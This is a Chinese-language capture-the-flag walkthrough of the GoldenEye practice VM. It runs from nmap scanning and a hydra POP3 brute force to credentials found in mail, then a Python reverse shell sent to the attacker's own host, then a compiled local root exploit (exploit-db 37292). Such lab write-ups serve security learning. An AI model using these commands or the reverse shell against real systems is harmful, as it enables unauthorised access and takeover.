golden打靶机记录

信息收集

nmap 端口发现
nmap -p- 192.168.43.107
nmap -p25,80,53,55007,55006

访问80端口
192.168.43.107:80

查看源代码：
js代码中得到用户名以及htmlencode编码以及其他信息：
  boris
  Natalya
  InvincibleHack3r
htmldecode编码得到如下：
  InvincibleHack3r 
根据页面内容进行登入：
  192.168.43.107:80/sev-home/
  boris
  InvincibleHack3r
信息收集：
 有一个pop3服务在某个端口上

pop3爆破

尝试访问：25、55006、55007端口，发现55007可以访问
生成user字典
echo -e "boris\nnatalya" > user.txt
进行pop3爆破
hydra -L user.txt -P /usr/share/wordlists/fasttrack.txt 192.168.43.107 -s 55007 pop3

得到密码

Natalya bird  
boris secret1!

nc连接到pop3

nc 192.168.43.107 55007  
登入
user natalya  
pass bird

list 列出邮件
retr 查看邮件

信息收集

发件人：
root@ubuntu
Janus  
natalya@ubuntu  
boris@ubuntu  
alec@janus.boss


查看邮件得到用户名密码:
username: xenia  
password: RCP90rulez!

绑定hosts文件
192.168.43.107 severnaya-station.com

访问线索提供的路径
severnaya-station.com/gnocertdir

页面信息收集：
得到doak用户，创建doak字典

再次进行pop3密码爆破：
得到用户名密码
login: doak 
password: goat

登入pop3进行信息收集
得到新线索
username: dr_doak  
password: 4England!

http://severnaya-station.com/dir007key/for-007.jpg

使用exiftool工具进行图片分析
wget http://severnaya-station.com/dir007key/for-007.jpg
exiftool for-007.jpg

得到base64编码内容进行解密：
echo eFdpbnRlcjE5OTV4IQ== | base64 -d  

得到密码，以及线索得知为admin账户
passwd xWinter1995x!  
user admin

网页信息收集
http://severnaya-station.com/

找到可以进行代码注入的模块,j进行python反弹shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.43.62",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

反弹成功

提权

msf漏洞搜索
searchsploit moodle

找到exp
/usr/share/exploitdb/exploits/linux/local/37292.c  

修改exp，该靶机不支持gcc编译，只支持cc编译。
gpp--->cc

kali
nc 192.168.43.107 4444  < exp.c  -w 1

target
nc -nvlp -4444 > exp.c

cd /tmp
cc -o exp exp.c
./exp
id